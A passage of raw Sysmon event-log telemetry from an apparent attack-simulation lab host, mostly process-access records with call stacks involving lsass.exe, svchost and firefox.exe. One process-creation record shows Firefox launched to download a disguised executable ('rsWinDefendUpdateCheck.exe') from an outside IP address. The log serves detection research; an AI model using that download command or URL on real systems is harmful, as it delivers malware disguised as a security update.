Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.195{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043709Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043708Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043707Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043706Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.187{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.5.1758652675\1155109919" -childID 4 -isForBrowser -prefsHandle 4448 -prefMapHandle 4444 -prefsLen 31523 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {583712f4-45ee-4c62-9645-5772715da610} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 4408 1d97a0c9e58 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043705Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043704Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043703Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043702Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043701Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043700Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043699Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043698Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043697Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:00.179{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043696Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 